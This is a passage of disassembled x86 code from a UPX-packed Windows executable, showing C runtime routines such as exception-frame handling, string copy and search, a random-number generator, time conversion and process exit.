push esi
mov esi, ecx
call sub_4191E5
test byte ptr [esp+8], 1
jz short loc_419206
push esi
call sub_41930D
pop ecx
loc_419206: ; CODE XREF: UPX0:004191FD�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_41AC96
mov dword ptr [esi], offset off_424F00
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419224 proc near ; CODE XREF: sub_4191C1+12�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
test byte ptr dword_44BEAC, 1
push esi
mov esi, offset off_424F00
jnz short loc_419266
or dword_44BEAC, 1
lea eax, [ebp+var_4]
push eax
mov ecx, offset dword_44BEA0
mov [ebp+var_4], offset dword_424F08
call sub_41AC59
push offset loc_4236E9
mov dword_44BEA0, esi
call sub_41A2A1
pop ecx
loc_419266: ; CODE XREF: sub_419224+13�j
push offset dword_44BEA0
lea ecx, [ebp+var_10]
call sub_41AC96
push offset dword_426CF0
lea eax, [ebp+var_10]
push eax
mov [ebp+var_10], esi
call sub_41A2B3
int 3 ; Trap to Debugger
loc_419285: ; CODE XREF: sub_4192B6:loc_4192BF�j
push 8
push offset stru_424F18
call __SEH_prolog
and [ebp+var_4], 0
push 0
push 1
call loc_41AD85
pop ecx
pop ecx
jmp short loc_4192A9
; ---------------------------------------------------------------------------
loc_4192A2: ; DATA XREF: UPX0:stru_424F18�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4192A6: ; DATA XREF: UPX0:stru_424F18�o
mov esp, [ebp+var_18]
loc_4192A9: ; CODE XREF: sub_419224+7C�j
or [ebp+var_4], 0FFFFFFFFh
push 3
call dword_42418C ; ExitProcess
int 3 ; Trap to Debugger
sub_419224 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4192B6 proc near ; CODE XREF: sub_401D60+133�p
; sub_401EB0+D7�p ...
cmp ecx, dword_42A290
jnz short loc_4192BF
retn
; ---------------------------------------------------------------------------
loc_4192BF: ; CODE XREF: sub_4192B6+6�j
jmp loc_419285
sub_4192B6 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4192D0 proc near ; CODE XREF: sub_401EB0+5�p
; sub_404DB0+B�p ...
arg_0 = byte ptr 4
cmp eax, 1000h
jnb short loc_4192E5
neg eax
add eax, esp
add eax, 4
test [eax], eax
xchg eax, esp
mov eax, [eax]
push eax
retn
; ---------------------------------------------------------------------------
loc_4192E5: ; CODE XREF: sub_4192D0+5�j
push ecx
lea ecx, [esp+4+arg_0]
loc_4192EA: ; CODE XREF: sub_4192D0+2C�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4192EA
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4192D0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41930D proc near ; CODE XREF: UPX0:004023C0�p
; UPX0:00402790�p ...
jmp sub_419DDD
sub_41930D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419312 proc near ; CODE XREF: sub_4023D0+76�p
; sub_403950+3F7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
call sub_41B330
mov ebx, [eax+64h]
cmp ebx, off_42A5CC
jz short loc_41932E
call sub_41B2CF
mov ebx, eax
loc_41932E: ; CODE XREF: sub_419312+13�j
cmp dword ptr [ebx+14h], 0
jnz short loc_419343
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41B0F0
pop ecx
pop ecx
jmp short loc_419378
; ---------------------------------------------------------------------------
loc_419343: ; CODE XREF: sub_419312+20�j
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
loc_41934B: ; CODE XREF: sub_419312+60�j
movzx eax, byte ptr [esi]
push eax
push ebx
call sub_41B025
mov [ebp+var_4], eax
movzx eax, byte ptr [edi]
push eax
push ebx
inc esi
call sub_41B025
add esp, 10h
mov ecx, eax
mov eax, [ebp+var_4]
inc edi
test eax, eax
jz short loc_419374
cmp eax, ecx
jz short loc_41934B
loc_419374: ; CODE XREF: sub_419312+5C�j
pop edi
sub eax, ecx
pop esi
loc_419378: ; CODE XREF: sub_419312+2F�j
pop ebx
leave
retn
sub_419312 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41937B proc near ; CODE XREF: sub_41BAB6+60�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_41937B endp
; ---------------------------------------------------------------------------
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_4193AB proc near ; CODE XREF: sub_41B712+25�p
; sub_41B93A+149�p ...
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_4193AB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4193B2 proc near ; CODE XREF: sub_41953C+7E�p
; sub_41BAB6:loc_41BAD9�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, large fs:0
mov [ebp+var_4], esi
mov [ebp+var_8], offset loc_4193DB
push 0
push [ebp+arg_4]
push [ebp+var_8]
push [ebp+arg_0]
call sub_422EE0 ; RtlUnwind
loc_4193DB: ; DATA XREF: sub_4193B2+12�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and eax, 0FFFFFFFDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov edi, large fs:0
mov ebx, [ebp+var_4]
mov [ebx], edi
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4193B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419404 proc near ; CODE XREF: SEH_4023D0+5�j
; SEH_4027A0+5�j ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push [ebp+var_4]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41BDDF
add esp, 20h
mov [ebp+var_4], eax
pop edi
pop esi
pop ebx
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_419404 endp
; =============== S U B R O U T I N E =======================================
sub_41943A proc near ; DATA XREF: sub_4196FD+1F�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cld
mov eax, [esp+arg_4]
mov ecx, [eax+8]
cmp ecx, dword_42A290
jz short loc_419456
mov eax, [esp+arg_0]
or dword ptr [eax+4], 8
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_419456: ; CODE XREF: sub_41943A+E�j
push 0
push eax
push dword ptr [eax+14h]
push dword ptr [eax+0Ch]
push 0
push [esp+14h+arg_8]
push dword ptr [eax+10h]
push [esp+1Ch+arg_0]
call sub_41BDDF
add esp, 20h
retn
sub_41943A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419475 proc near ; CODE XREF: sub_41953C+96�p
; sub_41BB1D+33�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
cmp [ebp+arg_0], 123h
jnz short loc_419497
mov eax, offset loc_419510
mov ecx, [ebp+arg_4]
mov [ecx], eax
xor eax, eax
inc eax
jmp loc_419539
; ---------------------------------------------------------------------------
loc_419497: ; CODE XREF: sub_419475+E�j
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_41953C
mov eax, dword_42A290
mov [ebp+var_20], eax
mov eax, [ebp+arg_10]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_18], eax
mov eax, [ebp+arg_14]
mov [ebp+var_14], eax
mov eax, [ebp+arg_18]
mov [ebp+var_10], eax
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call sub_41B330
call dword ptr [eax+74h]
pop ecx
pop ecx
and [ebp+var_34], 0
loc_419510: ; DATA XREF: sub_419475+10�o
cmp [ebp+var_4], 0
jz short loc_41952D
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_419536
; ---------------------------------------------------------------------------
loc_41952D: ; CODE XREF: sub_419475+9F�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_419536: ; CODE XREF: sub_419475+B6�j
mov eax, [ebp+var_34]
loc_419539: ; CODE XREF: sub_419475+1D�j
pop ebx
leave
retn
sub_419475 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41953C proc near ; DATA XREF: sub_419475+26�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
cld
mov eax, [ebp+arg_4]
mov eax, [eax+8]
cmp eax, dword_42A290
jz short loc_419567
mov eax, [ebp+arg_0]
mov eax, [eax+4]
or eax, 8
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
xor eax, eax
inc eax
jmp loc_4195EB
; ---------------------------------------------------------------------------
loc_419567: ; CODE XREF: sub_41953C+12�j
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
jz short loc_419581
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
xor eax, eax
inc eax
jmp short loc_4195EB
; ---------------------------------------------------------------------------
loc_419581: ; CODE XREF: sub_41953C+34�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+18h]
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
push [ebp+arg_0]
call sub_41BDDF
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_4195BF
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4193B2
loc_4195BF: ; CODE XREF: sub_41953C+76�j
push 0
push 0
push 0
push 0
push 0
lea eax, [ebp+var_4]
push eax
push 123h
call sub_419475
add esp, 1Ch
mov eax, [ebp+var_4]
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp eax
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
loc_4195EB: ; CODE XREF: sub_41953C+26�j
; sub_41953C+43�j
pop ebx
leave
retn
sub_41953C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4195EE proc near ; CODE XREF: sub_41BB1D+52�p
; sub_41BBDB+107�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
jl short loc_419644
loc_41960C: ; CODE XREF: sub_4195EE+51�j
cmp esi, 0FFFFFFFFh
jnz short loc_419616
call sub_41BEB6
loc_419616: ; CODE XREF: sub_4195EE+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
lea eax, [ebx+eax*4]
cmp [eax+4], ecx
jge short loc_41962A
cmp ecx, [eax+8]
jle short loc_41962F
loc_41962A: ; CODE XREF: sub_4195EE+35�j
cmp esi, 0FFFFFFFFh
jnz short loc_41963B
loc_41962F: ; CODE XREF: sub_4195EE+3A�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_41963B: ; CODE XREF: sub_4195EE+3F�j
cmp [ebp+arg_4], 0
jge short loc_41960C
mov eax, [ebp+var_4]
loc_419644: ; CODE XREF: sub_4195EE+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_419658
cmp esi, eax
jbe short loc_41965D
loc_419658: ; CODE XREF: sub_4195EE+64�j
call sub_41BEB6
loc_41965D: ; CODE XREF: sub_4195EE+68�j
pop edi
lea eax, [esi+esi*4]
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_4195EE endp
; =============== S U B R O U T I N E =======================================
sub_419668 proc near ; CODE XREF: sub_41B776+28�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov [esi], eax
call sub_41B330
mov eax, [eax+88h]
mov [esi+4], eax
call sub_41B330
mov [eax+88h], esi
mov eax, esi
pop esi
retn
sub_419668 endp
; =============== S U B R O U T I N E =======================================
sub_419690 proc near ; CODE XREF: sub_41B8CB+56�p
arg_0 = dword ptr 4
call sub_41B330
mov eax, [eax+88h]
jmp short loc_4196A8
; ---------------------------------------------------------------------------
loc_41969D: ; CODE XREF: sub_419690+1A�j
mov ecx, [eax]
cmp ecx, [esp+arg_0]
jz short loc_4196AE
mov eax, [eax+4]
loc_4196A8: ; CODE XREF: sub_419690+B�j
test eax, eax
jnz short loc_41969D
inc eax
retn
; ---------------------------------------------------------------------------
loc_4196AE: ; CODE XREF: sub_419690+13�j
xor eax, eax
retn
sub_419690 endp
; =============== S U B R O U T I N E =======================================
sub_4196B1 proc near ; CODE XREF: sub_41B8CB+9�p
arg_0 = dword ptr 4
push esi
call sub_41B330
mov esi, [esp+4+arg_0]
cmp esi, [eax+88h]
jnz short loc_4196D3
call sub_41B330
mov ecx, [esi+4]
mov [eax+88h], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4196D3: ; CODE XREF: sub_4196B1+10�j
call sub_41B330
mov eax, [eax+88h]
jmp short loc_4196E9
; ---------------------------------------------------------------------------
loc_4196E0: ; CODE XREF: sub_4196B1+3C�j
mov ecx, [eax+4]
cmp esi, ecx
jz short loc_4196F5
mov eax, ecx
loc_4196E9: ; CODE XREF: sub_4196B1+2D�j
cmp dword ptr [eax+4], 0
jnz short loc_4196E0
pop esi
jmp sub_41BEB6
; ---------------------------------------------------------------------------
loc_4196F5: ; CODE XREF: sub_4196B1+34�j
mov ecx, [esi+4]
mov [eax+4], ecx
pop esi
retn
sub_4196B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4196FD proc near ; CODE XREF: sub_41B776+77�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_42A290
and [ebp+var_18], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
inc eax
mov [ebp+var_14], offset sub_41943A
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_18], eax
lea eax, [ebp+var_18]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_41BEF0
mov ecx, eax
mov eax, [ebp+var_18]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_4196FD endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419758 proc near ; CODE XREF: sub_41AF24+70�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_419770
push [ebp+arg_0]
call sub_422EE0 ; RtlUnwind
loc_419770: ; DATA XREF: sub_419758+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_419758 endp
; =============== S U B R O U T I N E =======================================
sub_419778 proc near ; DATA XREF: sub_41979A+A�o
; sub_419802+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_419799
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_419799: ; CODE XREF: sub_419778+10�j
retn
sub_419778 endp
; =============== S U B R O U T I N E =======================================
sub_41979A proc near ; CODE XREF: sub_41AF24+7D�p
; sub_41AF24+D0�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_419778
push large dword ptr fs:0
mov large fs:0, esp
loc_4197B7: ; CODE XREF: sub_41979A:loc_4197F2�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_4197F4
cmp esi, [esp+1Ch+arg_4]
jz short loc_4197F4
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_4197F2
push 101h
mov eax, [ebx+esi*4+8]
call sub_41982E
call dword ptr [ebx+esi*4+8]
loc_4197F2: ; CODE XREF: sub_41979A+44�j
jmp short loc_4197B7
; ---------------------------------------------------------------------------
loc_4197F4: ; CODE XREF: sub_41979A+2A�j
; sub_41979A+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_41979A endp
; =============== S U B R O U T I N E =======================================
sub_419802 proc near ; CODE XREF: sub_41B8CB+60�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_419778
jnz short locret_419824
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_419824
mov eax, 1
locret_419824: ; CODE XREF: sub_419802+10�j
; sub_419802+1B�j
retn
sub_419802 endp
; =============== S U B R O U T I N E =======================================
sub_419825 proc near ; CODE XREF: sub_41BEF0+1E�p
; sub_41BEF0+40�p
push ebx
push ecx
mov ebx, offset dword_42A2A0
jmp short loc_419838
sub_419825 endp
; =============== S U B R O U T I N E =======================================
sub_41982E proc near ; CODE XREF: sub_41979A+4F�p
; sub_41AF24+8E�p
push ebx
push ecx
mov ebx, offset dword_42A2A0
mov ecx, [ebp+8]
loc_419838: ; CODE XREF: sub_419825+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_41982E endp
; =============== S U B R O U T I N E =======================================
sub_419846 proc near ; CODE XREF: sub_402550+37�p
; sub_403950+73�p ...
arg_0 = dword ptr 4
call sub_41B330
mov ecx, [esp+arg_0]
mov [eax+14h], ecx
retn
sub_419846 endp
; =============== S U B R O U T I N E =======================================
sub_419853 proc near ; CODE XREF: sub_402550+1DA�p
; sub_4030C0+5A�p ...
call sub_41B330
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov [eax+14h], ecx
mov eax, ecx
shr eax, 10h
and eax, 7FFFh
retn
sub_419853 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419875 proc near ; CODE XREF: sub_402550+31�p
; sub_403950+6D�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
call dword_424194 ; GetSystemTimeAsFileTime
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
push 0
add eax, 2AC18000h
push 989680h
adc ecx, 0FE624E21h
push ecx
push eax
call sub_41BF40
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short locret_4198AC
mov [ecx], eax
locret_4198AC: ; CODE XREF: sub_419875+33�j
leave
retn
sub_419875 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4198AE proc near ; CODE XREF: sub_402880+17�p
; sub_402880+2B�p ...
jmp sub_41930D
sub_4198AE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4198C0 proc near ; CODE XREF: sub_402DA0+90�p
; sub_402E90+B1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_41995F
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_4198EC
shr ecx, 2
jnz loc_41996F
jmp short loc_419913
; ---------------------------------------------------------------------------
loc_4198EC: ; CODE XREF: sub_4198C0+1F�j
; sub_4198C0+45�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
sub ecx, 1
jz short loc_419926
test al, al
jz short loc_41992E
test esi, 3
jnz short loc_4198EC
mov ebx, ecx
shr ecx, 2
jnz short loc_41996F
loc_41990E: ; CODE XREF: sub_4198C0+AD�j
and ebx, 3
jz short loc_419926
loc_419913: ; CODE XREF: sub_4198C0+2A�j
; sub_4198C0+64�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
test al, al
jz short loc_419958
sub ebx, 1
jnz short loc_419913
loc_419926: ; CODE XREF: sub_4198C0+39�j
; sub_4198C0+51�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41992E: ; CODE XREF: sub_4198C0+3D�j
test edi, 3
jz short loc_41994C
loc_419936: ; CODE XREF: sub_4198C0+8A�j
mov [edi], al
add edi, 1
sub ecx, 1
jz loc_4199DC
test edi, 3
jnz short loc_419936
loc_41994C: ; CODE XREF: sub_4198C0+74�j
mov ebx, ecx
shr ecx, 2
jnz short loc_4199C7
loc_419953: ; CODE XREF: sub_4198C0+9B�j
; sub_4198C0+116�j
mov [edi], al
add edi, 1
loc_419958: ; CODE XREF: sub_4198C0+5F�j
sub ebx, 1
jnz short loc_419953
pop ebx
pop esi
loc_41995F: ; CODE XREF: sub_4198C0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_419965: ; CODE XREF: sub_4198C0+C7�j
; sub_4198C0+DF�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_41990E
loc_41996F: ; CODE XREF: sub_4198C0+24�j
; sub_4198C0+4C�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_419965
test dl, dl
jz short loc_4199B9
test dh, dh
jz short loc_4199AF
test edx, 0FF0000h
jz short loc_4199A5
test edx, 0FF000000h
jnz short loc_419965
mov [edi], edx
jmp short loc_4199BD
; ---------------------------------------------------------------------------
loc_4199A5: ; CODE XREF: sub_4198C0+D7�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_4199BD
; ---------------------------------------------------------------------------
loc_4199AF: ; CODE XREF: sub_4198C0+CF�j
and edx, 0FFh
mov [edi], edx
jmp short loc_4199BD
; ---------------------------------------------------------------------------
loc_4199B9: ; CODE XREF: sub_4198C0+CB�j
xor edx, edx
mov [edi], edx
loc_4199BD: ; CODE XREF: sub_4198C0+E3�j
; sub_4198C0+ED�j ...
add edi, 4
xor eax, eax
sub ecx, 1
jz short loc_4199D3
loc_4199C7: ; CODE XREF: sub_4198C0+91�j
xor eax, eax
loc_4199C9: ; CODE XREF: sub_4198C0+111�j
mov [edi], eax
add edi, 4
sub ecx, 1
jnz short loc_4199C9
loc_4199D3: ; CODE XREF: sub_4198C0+105�j
and ebx, 3
jnz loc_419953
loc_4199DC: ; CODE XREF: sub_4198C0+7E�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4198C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4199F0 proc near ; CODE XREF: sub_402DA0+37�p
; sub_402DA0+54�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_419A70
mov dh, [ecx+1]
test dh, dh
jz short loc_419A5D
loc_419A08: ; CODE XREF: sub_4199F0+58�j
; sub_4199F0+6B�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
add esi, 1
cmp al, dl
jz short loc_419A2E
test al, al
jz short loc_419A28
loc_419A1B: ; CODE XREF: sub_4199F0+36�j
mov al, [esi]
add esi, 1
loc_419A20: ; CODE XREF: sub_4199F0+45�j
cmp al, dl
jz short loc_419A2E
test al, al
jnz short loc_419A1B
loc_419A28: ; CODE XREF: sub_4199F0+29�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_419A2E: ; CODE XREF: sub_4199F0+25�j
; sub_4199F0+32�j
mov al, [esi]
add esi, 1
cmp al, dh
jnz short loc_419A20
lea edi, [esi-1]
loc_419A3A: ; CODE XREF: sub_4199F0+69�j
mov ah, [ecx+2]
test ah, ah
jz short loc_419A69
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_419A08
mov al, [ecx+3]
test al, al
jz short loc_419A69
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_419A3A
jmp short loc_419A08
; ---------------------------------------------------------------------------
loc_419A5D: ; CODE XREF: sub_4199F0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_41A3F6
; ---------------------------------------------------------------------------
loc_419A69: ; CODE XREF: sub_4199F0+4F�j
; sub_4199F0+5F�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_419A70: ; CODE XREF: sub_4199F0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_4199F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419A76 proc near ; CODE XREF: sub_402DA0+1C�p
; sub_402E90+1D�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 18h
push offset stru_424F28
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_24], ebx
call sub_41B330
mov esi, [eax+64h]
mov [ebp+var_1C], esi
cmp esi, off_42A5CC
jz short loc_419AA4
call sub_41B2CF
mov esi, eax
mov [ebp+var_1C], esi
loc_419AA4: ; CODE XREF: sub_419A76+22�j
mov eax, [esi+14h]
cmp eax, ebx
jnz short loc_419AD3
mov eax, [ebp+arg_0]
mov edx, eax
cmp [eax], bl
jz loc_419B81
loc_419AB8: ; CODE XREF: sub_419A76+56�j
mov cl, [edx]
cmp cl, 41h
jl short loc_419AC9
cmp cl, 5Ah
jg short loc_419AC9
add cl, 20h
mov [edx], cl
loc_419AC9: ; CODE XREF: sub_419A76+47�j
; sub_419A76+4C�j
inc edx
cmp [edx], bl
jnz short loc_419AB8
jmp loc_419B81
; ---------------------------------------------------------------------------
loc_419AD3: ; CODE XREF: sub_419A76+33�j
push 1
push dword ptr [esi+4]
push ebx
push ebx
push 0FFFFFFFFh
push [ebp+arg_0]
push 100h
push eax
call sub_41C18B
add esp, 20h
mov [ebp+var_20], eax
cmp eax, ebx
jz loc_419B7E
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_4192D0
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_419B2B
; ---------------------------------------------------------------------------
loc_419B14: ; DATA XREF: UPX0:stru_424F28�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
